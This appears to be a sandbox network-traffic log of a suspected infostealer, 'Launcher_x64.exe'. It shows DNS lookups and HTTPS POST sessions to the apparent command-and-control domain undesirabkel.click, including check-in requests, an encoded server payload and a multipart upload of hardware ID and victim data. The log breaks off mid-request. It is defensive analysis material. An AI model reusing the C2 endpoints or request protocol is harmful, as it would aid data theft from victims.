                                                                                        Dec 31, 2024 17:37:29.897202015 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.897211075 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.897253990 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.897841930 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.897984982 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.898030996 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.898041010 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.898052931 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.898091078 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.898199081 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.898221016 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:29.898237944 CET49742443192.168.2.4188.114.97.3
                                                                                        Dec 31, 2024 17:37:29.898243904 CET44349742188.114.97.3192.168.2.4
                                                                                        Dec 31, 2024 17:37:53.470264912 CET6553153192.168.2.4162.159.36.2
                                                                                        Dec 31, 2024 17:37:53.475059032 CET5365531162.159.36.2192.168.2.4
                                                                                        Dec 31, 2024 17:37:53.475128889 CET6553153192.168.2.4162.159.36.2
                                                                                        Dec 31, 2024 17:37:53.479945898 CET5365531162.159.36.2192.168.2.4
                                                                                        Dec 31, 2024 17:37:53.948426962 CET6553153192.168.2.4162.159.36.2
                                                                                        Dec 31, 2024 17:37:53.954137087 CET5365531162.159.36.2192.168.2.4
                                                                                        Dec 31, 2024 17:37:53.954195976 CET6553153192.168.2.4162.159.36.2
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 31, 2024 17:37:09.693250895 CET5605653192.168.2.41.1.1.1
                                                                                        Dec 31, 2024 17:37:09.713295937 CET53560561.1.1.1192.168.2.4
                                                                                        Dec 31, 2024 17:37:53.469634056 CET5364016162.159.36.2192.168.2.4
                                                                                        Dec 31, 2024 17:37:53.986955881 CET53573521.1.1.1192.168.2.4
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:37:09.693250895 CET192.168.2.41.1.1.10x7570Standard query (0)undesirabkel.clickA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Dec 31, 2024 17:37:09.713295937 CET1.1.1.1192.168.2.40x7570No error (0)undesirabkel.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Dec 31, 2024 17:37:09.713295937 CET1.1.1.1192.168.2.40x7570No error (0)undesirabkel.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                        • undesirabkel.click
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.449730188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:10 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-12-31 16:37:10 UTC1129INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=2m6c9mqt0g30ugddenc86joq7f; expires=Sat, 26 Apr 2025 10:23:49 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOcQQzXVVR5m0Nn%2B%2FUSM0Lycl1%2FY94S3YobatSgfBGut7XagEZBebUEfBOmWUcvKEleEMm8gAaqKy4IfwMKmo0rvC6M5Xb8TgfZl3dDEr8jjc4g8%2FFN4Wj5IBLji1b6N9CMqnTo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb1540e0dc402-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1481&rtt_var=563&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1928665&cwnd=167&unsent_bytes=0&cid=89e7628bde0ae077&ts=487&x=0"
                                                                                        2024-12-31 16:37:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-12-31 16:37:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.449731188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:11 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 54
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:11 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--swetamubcoyu&j=
                                                                                        2024-12-31 16:37:11 UTC1133INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=enp1jfhntln4oiiv0pfvam4b2v; expires=Sat, 26 Apr 2025 10:23:50 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNtR5YZ1WluhJMp%2FFabtT7SGfvw2I%2BzNKb8ghc9UgrDl57OGh7qnqoC%2BDzIfDb%2BnqLScxUn7upUQDwaCN%2Bc1lxAoVpAv8SbBGA4fIklnIOaQXDphkBLfB%2BHuFdZQ75ZtjFfhhXE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb15ad99780d3-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1519&rtt_var=639&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=956&delivery_rate=1922317&cwnd=232&unsent_bytes=0&cid=45b1b7a52898a1d9&ts=449&x=0"
                                                                                        2024-12-31 16:37:11 UTC236INData Raw: 34 39 39 34 0d 0a 69 4f 67 6c 4f 55 30 48 79 67 70 54 51 6f 31 2f 44 51 48 2b 55 32 79 54 32 55 68 41 6f 75 4a 37 63 57 55 35 44 76 6c 69 66 52 2f 7a 79 6c 4d 62 64 7a 50 6d 4b 43 41 6e 72 30 56 35 63 34 73 32 51 4c 47 34 4c 47 4b 59 68 42 6f 64 46 6c 77 69 32 78 51 51 50 62 4b 4f 52 46 55 2b 59 75 59 6f 4e 6a 71 76 52 56 5a 36 33 44 59 43 73 65 4e 71 4a 63 69 41 47 68 30 48 57 47 57 57 45 68 46 38 34 49 52 43 55 53 68 6b 72 6d 73 2f 4c 2b 67 61 61 47 43 55 50 51 58 2b 73 53 56 69 6a 73 41 65 43 30 63 44 4c 4c 51 48 43 58 37 46 69 56 5a 53 62 33 72 6d 63 58 45 6e 34 31 30 33 49 35 38 32 44 76 2b 2f 4c 43 76 4b 69 68 4d 56 42 6c 31 6b 69 51 73 62 64 2b 43 4b 51 56 41 69 62 62 70 6d 4e 53 6a 6a 48 47
                                                                                        Data Ascii: 4994iOglOU0HygpTQo1/DQH+U2yT2UhAouJ7cWU5DvlifR/zylMbdzPmKCAnr0V5c4s2QLG4LGKYhBodFlwi2xQQPbKORFU+YuYoNjqvRVZ63DYCseNqJciAGh0HWGWWEhF84IRCUShkrms/L+gaaGCUPQX+sSVijsAeC0cDLLQHCX7FiVZSb3rmcXEn4103I582Dv+/LCvKihMVBl1kiQsbd+CKQVAibbpmNSjjHG
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 4a 67 33 48 39 4f 39 71 4e 71 65 6f 44 54 4b 78 41 57 53 6e 6d 57 45 42 6b 39 39 63 52 65 47 79 68 70 36 44 42 78 4b 4f 4d 54 61 6d 43 54 4e 67 2f 78 71 53 55 69 77 34 67 52 46 77 31 55 59 35 51 4f 46 58 72 69 67 30 42 55 4b 47 32 75 5a 7a 4a 67 6f 56 31 6f 65 39 78 70 54 74 47 72 4b 53 48 55 6a 51 68 54 47 42 56 31 32 77 63 54 50 62 4c 4b 51 56 55 75 61 4b 68 36 4f 53 76 6b 47 48 31 6f 6c 54 77 44 38 62 59 67 4c 63 4f 41 48 68 6b 4e 56 47 61 66 44 52 4a 37 36 6f 6f 48 46 57 39 69 73 43 68 70 59 4d 77 59 66 32 53 51 4a 30 7a 4c 2b 7a 56 73 32 63 41 65 48 30 63 44 4c 4a 4d 46 48 48 37 68 68 55 52 54 4a 48 65 6f 65 6a 63 74 36 67 39 70 5a 70 49 37 44 65 4f 78 4a 43 54 44 69 52 49 61 41 6c 78 6f 32 30 35 66 65 76 4c 4b 48 78 73 4f 61 4b 4e 6b 4f 7a 66 76 58
                                                                                        Data Ascii: Jg3H9O9qNqeoDTKxAWSnmWEBk99cReGyhp6DBxKOMTamCTNg/xqSUiw4gRFw1UY5QOFXrig0BUKG2uZzJgoV1oe9xpTtGrKSHUjQhTGBV12wcTPbLKQVUuaKh6OSvkGH1olTwD8bYgLcOAHhkNVGafDRJ76ooHFW9isChpYMwYf2SQJ0zL+zVs2cAeH0cDLJMFHH7hhURTJHeoejct6g9pZpI7DeOxJCTDiRIaAlxo205fevLKHxsOaKNkOzfvX
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 78 41 75 4f 33 49 43 54 50 6a 52 56 54 53 52 74 72 67 30 42 48 50 63 43 4a 55 31 67 6c 4a 35 31 72 50 79 37 6f 43 79 39 38 30 69 68 4f 39 72 64 71 65 6f 43 4e 47 42 73 42 53 57 4f 57 41 78 46 7a 35 59 39 49 55 79 39 6c 70 57 30 31 4b 2b 51 65 59 6d 65 4f 4f 77 37 35 76 69 73 6f 79 73 42 58 55 77 42 44 4c 4d 4e 41 4c 6d 72 68 79 48 4a 59 49 57 75 76 66 6e 45 2f 6f 51 51 76 5a 4a 42 78 56 72 47 32 49 69 66 46 6a 78 67 5a 43 56 35 6d 6c 77 67 52 66 76 69 46 51 31 73 6a 62 61 4a 6c 50 79 54 6e 46 47 52 6f 6d 6a 45 50 2b 2f 74 6b 59 73 65 59 57 55 74 48 62 32 75 58 44 52 41 2f 33 34 6c 4a 56 53 68 7a 36 48 64 2f 4f 61 38 61 59 79 50 45 63 51 4c 34 75 79 45 6f 78 49 41 65 48 67 4a 59 61 35 67 4e 47 48 66 6b 6a 55 4e 58 4a 6d 69 75 61 44 59 6b 36 67 39 71 61 70
                                                                                        Data Ascii: xAuO3ICTPjRVTSRtrg0BHPcCJU1glJ51rPy7oCy980ihO9rdqeoCNGBsBSWOWAxFz5Y9IUy9lpW01K+QeYmeOOw75visoysBXUwBDLMNALmrhyHJYIWuvfnE/oQQvZJBxVrG2IifFjxgZCV5mlwgRfviFQ1sjbaJlPyTnFGRomjEP+/tkYseYWUtHb2uXDRA/34lJVShz6Hd/Oa8aYyPEcQL4uyEoxIAeHgJYa5gNGHfkjUNXJmiuaDYk6g9qap
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 74 54 78 69 33 38 34 41 55 77 42 58 4c 4d 4e 41 46 6e 54 34 68 45 6c 53 49 6d 4f 67 62 7a 38 74 35 42 74 6b 5a 4a 73 33 41 2f 6d 32 4c 79 48 42 68 42 4d 42 42 46 42 6d 6c 67 70 66 4d 36 71 4e 58 78 74 33 4a 59 39 6b 47 44 44 30 44 33 6b 6a 67 33 38 58 73 62 77 6d 59 70 6a 41 47 68 77 4f 56 47 53 54 44 78 42 35 35 49 78 42 56 69 70 71 6f 6e 6f 35 4c 75 49 57 59 47 69 4f 4d 51 50 31 74 79 34 71 79 34 70 5a 58 55 64 63 64 4e 74 59 58 30 6a 6e 68 55 64 59 4f 53 57 33 4a 69 68 67 36 42 45 76 4f 39 77 39 41 50 47 30 4a 69 37 4c 69 42 67 66 43 56 78 70 6b 67 67 58 62 2b 75 4f 54 31 6f 68 61 71 6c 73 4e 43 58 72 47 6d 74 6c 6b 33 46 41 73 62 77 79 59 70 6a 41 4e 6a 51 79 47 55 32 68 51 41 41 7a 38 38 70 41 56 32 38 39 36 47 51 79 4c 4f 63 53 61 57 71 51 4f 77 66
                                                                                        Data Ascii: tTxi384AUwBXLMNAFnT4hElSImOgbz8t5BtkZJs3A/m2LyHBhBMBBFBmlgpfM6qNXxt3JY9kGDD0D3kjg38XsbwmYpjAGhwOVGSTDxB55IxBVipqono5LuIWYGiOMQP1ty4qy4pZXUdcdNtYX0jnhUdYOSW3Jihg6BEvO9w9APG0Ji7LiBgfCVxpkggXb+uOT1ohaqlsNCXrGmtlk3FAsbwyYpjANjQyGU2hQAAz88pAV2896GQyLOcSaWqQOwf
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 63 53 44 48 52 59 49 57 6d 32 64 45 68 68 30 2b 49 52 4b 56 43 64 74 6f 57 6b 31 4a 65 49 62 59 32 6d 64 4e 67 44 2f 73 32 70 73 67 49 63 42 55 31 38 62 54 59 73 62 44 57 76 6e 71 30 70 55 62 33 72 6d 63 58 45 6e 34 31 30 33 49 35 55 6a 43 76 79 70 49 79 58 4f 6a 78 6f 42 42 6c 5a 6e 69 51 63 51 65 65 32 47 51 56 51 70 5a 4b 31 69 50 53 66 71 46 6d 42 76 33 48 39 4f 39 71 4e 71 65 6f 43 75 45 67 41 51 57 47 4b 51 46 67 51 39 39 63 52 65 47 79 68 70 36 44 42 78 49 2b 51 57 61 32 4f 51 4d 51 72 38 75 7a 67 74 78 34 63 51 47 42 56 52 61 35 77 4c 46 33 62 6c 6a 46 56 58 49 58 65 74 65 69 4e 67 6f 56 31 6f 65 39 78 70 54 73 65 38 4f 6a 4c 44 77 69 67 46 42 45 31 6e 6c 67 78 66 59 71 53 54 42 31 77 6a 4a 66 41 6f 4e 79 2f 6d 48 6d 42 69 6c 54 30 44 39 4c 49 76
                                                                                        Data Ascii: cSDHRYIWm2dEhh0+IRKVCdtoWk1JeIbY2mdNgD/s2psgIcBU18bTYsbDWvnq0pUb3rmcXEn4103I5UjCvypIyXOjxoBBlZniQcQee2GQVQpZK1iPSfqFmBv3H9O9qNqeoCuEgAQWGKQFgQ99cReGyhp6DBxI+QWa2OQMQr8uzgtx4cQGBVRa5wLF3bljFVXIXeteiNgoV1oe9xpTse8OjLDwigFBE1nlgxfYqSTB1wjJfAoNy/mHmBilT0D9LIv
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 49 64 4e 56 68 33 32 78 39 52 5a 4b 71 4e 53 78 74 33 4a 61 74 76 4d 69 48 6c 46 47 4e 73 6d 7a 55 63 2b 37 77 34 49 38 47 4c 46 42 38 48 56 6d 47 52 41 52 5a 77 35 6f 64 41 58 43 42 67 36 43 5a 78 4a 2f 64 64 4e 79 4f 39 50 41 58 39 34 48 42 69 33 38 34 41 55 77 42 58 4c 4d 4e 41 48 33 66 76 67 45 70 59 49 47 61 36 61 54 63 79 37 78 42 6c 63 5a 59 36 43 2f 79 32 4a 79 48 47 68 68 49 66 46 56 4a 73 6d 41 74 66 4d 36 71 4e 58 78 74 33 4a 59 74 2f 4a 79 72 6f 45 58 6c 6f 6e 54 49 59 2f 4b 74 71 62 49 43 52 48 67 4a 48 41 33 71 4c 46 78 68 69 70 4a 4d 48 58 43 4d 6c 38 43 67 33 4b 65 6b 61 61 57 32 4f 4e 41 6a 2b 74 43 4d 72 78 49 67 61 45 77 4e 66 61 35 34 44 45 33 62 74 69 55 68 66 4a 6d 75 68 5a 33 46 75 72 78 70 33 49 38 52 78 4c 2b 71 34 4a 69 2b 41 6e
                                                                                        Data Ascii: IdNVh32x9RZKqNSxt3JatvMiHlFGNsmzUc+7w4I8GLFB8HVmGRARZw5odAXCBg6CZxJ/ddNyO9PAX94HBi384AUwBXLMNAH3fvgEpYIGa6aTcy7xBlcZY6C/y2JyHGhhIfFVJsmAtfM6qNXxt3JYt/JyroEXlonTIY/KtqbICRHgJHA3qLFxhipJMHXCMl8Cg3KekaaW2ONAj+tCMrxIgaEwNfa54DE3btiUhfJmuhZ3Furxp3I8RxL+q4Ji+An
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 62 49 74 73 48 42 7a 32 79 79 6d 64 51 4f 57 43 76 66 6e 4d 56 37 42 4e 68 5a 49 70 78 45 63 37 31 61 69 33 61 77 45 45 71 48 68 74 72 6c 30 42 48 50 66 2b 4e 52 31 77 31 63 36 39 6b 49 43 76 69 45 55 31 73 6d 79 63 4e 2f 72 67 37 4b 34 79 4c 46 46 4e 4a 47 32 75 44 51 45 63 39 78 59 31 52 57 41 42 6d 75 57 46 78 62 71 38 61 65 53 50 45 63 54 43 78 71 53 6b 79 77 34 38 49 4c 55 63 44 64 61 56 41 46 47 76 74 6d 6b 52 4e 4a 47 69 6b 65 51 39 67 74 30 6b 39 4d 63 35 6a 58 4f 37 37 4e 52 32 4f 77 42 68 54 58 32 4a 31 32 78 5a 66 4a 62 6a 45 42 30 6c 76 50 65 67 76 4d 6a 4c 39 47 32 78 31 6e 33 59 77 7a 35 77 38 4b 4d 65 51 48 67 51 49 47 79 4c 62 44 31 38 6c 30 38 70 4f 58 44 52 30 76 6d 55 68 4a 36 38 69 49 53 4f 45 63 56 61 78 6a 69 6b 73 7a 6f 63 50 41 6b
                                                                                        Data Ascii: bItsHBz2yymdQOWCvfnMV7BNhZIpxEc71ai3awEEqHhtrl0BHPf+NR1w1c69kICviEU1smycN/rg7K4yLFFNJG2uDQEc9xY1RWABmuWFxbq8aeSPEcTCxqSkyw48ILUcDdaVAFGvtmkRNJGikeQ9gt0k9Mc5jXO77NR2OwBhTX2J12xZfJbjEB0lvPegvMjL9G2x1n3Ywz5w8KMeQHgQIGyLbD18l08pOXDR0vmUhJ68iISOEcVaxjikszocPAk
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 54 42 64 73 35 34 59 48 46 57 39 77 6f 32 51 33 4c 66 70 53 66 6e 57 66 4a 77 6d 39 73 7a 73 76 7a 4d 41 6d 58 55 64 44 4c 4d 4e 41 4b 6e 37 6b 68 45 42 4e 50 69 69 49 59 7a 30 6a 34 78 78 6f 49 39 4a 78 43 4c 48 6a 65 57 79 41 68 41 68 54 58 77 73 2b 77 46 56 4d 4b 72 72 59 57 42 55 32 4a 62 34 6f 61 58 4b 68 58 58 30 6a 78 48 46 4a 38 71 6b 34 4a 4d 4f 57 47 6c 51 35 5a 57 32 57 44 31 4e 7a 34 59 70 41 53 7a 6c 2b 35 47 41 79 4f 76 55 6a 55 55 69 51 4e 77 6e 72 76 43 77 45 34 4d 42 58 55 77 67 62 4e 4b 4a 41 56 7a 33 56 78 41 64 44 62 7a 33 6f 58 54 49 75 34 52 70 35 63 74 45 5a 4c 63 75 42 61 41 37 48 6c 56 73 6e 41 45 74 39 6b 41 30 54 50 61 54 4b 51 52 74 33 4e 65 59 6f 4e 54 47 76 52 54 38 78 78 32 52 64 70 75 74 34 50 59 36 5a 57 51 56 48 41 7a 37
                                                                                        Data Ascii: TBds54YHFW9wo2Q3LfpSfnWfJwm9szsvzMAmXUdDLMNAKn7khEBNPiiIYz0j4xxoI9JxCLHjeWyAhAhTXws+wFVMKrrYWBU2Jb4oaXKhXX0jxHFJ8qk4JMOWGlQ5ZW2WD1Nz4YpASzl+5GAyOvUjUUiQNwnrvCwE4MBXUwgbNKJAVz3VxAdDbz3oXTIu4Rp5ctEZLcuBaA7HlVsnAEt9kA0TPaTKQRt3NeYoNTGvRT8xx2Rdput4PY6ZWQVHAz7
                                                                                        2024-12-31 16:37:11 UTC1369INData Raw: 2f 50 4b 55 52 74 33 4e 75 59 6f 49 32 43 33 58 53 68 74 6b 54 41 4e 2f 37 67 34 4d 4d 61 44 44 78 42 41 5a 56 4b 2b 44 52 4a 34 35 49 31 35 5a 51 35 76 75 47 55 2b 4a 36 30 39 61 48 57 66 44 7a 44 47 71 69 30 79 67 71 59 61 42 51 51 62 49 74 73 59 58 79 57 71 71 30 31 4c 49 6d 71 76 4b 68 45 6e 2b 52 34 76 4c 64 77 31 54 71 6e 37 44 79 2f 4e 68 52 63 55 52 58 70 6d 69 77 30 51 65 71 69 71 51 45 30 73 4a 65 59 6f 50 57 43 33 58 57 35 70 6a 44 77 42 39 76 63 74 4f 4d 66 41 56 31 4d 4a 47 7a 54 62 41 52 56 74 35 34 56 41 46 79 6c 72 70 69 67 75 62 76 5a 64 65 53 50 45 59 6b 43 78 71 57 70 36 67 4d 63 61 41 52 56 64 62 34 30 44 57 45 50 55 70 31 56 63 50 32 62 71 57 54 77 6b 2b 51 68 73 63 35 73 50 4d 4e 79 70 4c 54 4c 44 77 69 67 46 42 46 74 69 6e 45 42 52
                                                                                        Data Ascii: /PKURt3NuYoI2C3XShtkTAN/7g4MMaDDxBAZVK+DRJ45I15ZQ5vuGU+J609aHWfDzDGqi0ygqYaBQQbItsYXyWqq01LImqvKhEn+R4vLdw1Tqn7Dy/NhRcURXpmiw0QeqiqQE0sJeYoPWC3XW5pjDwB9vctOMfAV1MJGzTbARVt54VAFylrpigubvZdeSPEYkCxqWp6gMcaARVdb40DWEPUp1VcP2bqWTwk+Qhsc5sPMNypLTLDwigFBFtinEBR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.449732188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:12 UTC275OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=GHSI1GIXN
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 18116
                                                                                        Host: undesirabkel.click
                                                                                        2024-12-31 16:37:12 UTC15331OUTData Raw: 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 39 32 34 39 30 43 35 36 41 46 45 30 31 37 39 32 41 34 36 37 46 36 31 35 46 30 37 34 43 37 0d 0a 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 73 77 65 74 61 6d 75 62 63 6f 79 75 0d 0a 2d 2d 47 48 53 49 31 47 49 58 4e 0d 0a 43 6f 6e 74 65
                                                                                        Data Ascii: --GHSI1GIXNContent-Disposition: form-data; name="hwid"5D92490C56AFE01792A467F615F074C7--GHSI1GIXNContent-Disposition: form-data; name="pid"2--GHSI1GIXNContent-Disposition: form-data; name="lid"LPnhqo--swetamubcoyu--GHSI1GIXNConte
                                                                                        2024-12-31 16:37:12 UTC2785OUTData Raw: 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6
                                                                                        Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                                        2024-12-31 16:37:16 UTC1136INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:37:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=99jggtj64s7ktsgi2hbifen886; expires=Sat, 26 Apr 2025 10:23:55 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ic6EHd%2FO3b%2BawpRCafbDd%2FHSZ3qwdPdi7SAGwgyWUp46pCFxMS3QUZ%2FUJywzcJz9mcDNfQyKtloEs8mlRH9wNBKIM8SRNv5k3cH9Fvbzm7x%2FWg1oJWR340msyNuX9gvNNYql424%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb162b9ddde92-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1511&rtt_var=571&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19071&delivery_rate=1910994&cwnd=245&unsent_bytes=0&cid=66d4c83d85864d36&ts=3759&x=0"
                                                                                        2024-12-31 16:37:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:37:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.449733188.114.97.34437372C:\Users\user\Desktop\Launcher_x64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:37:17 UTC284OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=98XA9EBX2WNXENO8FY8
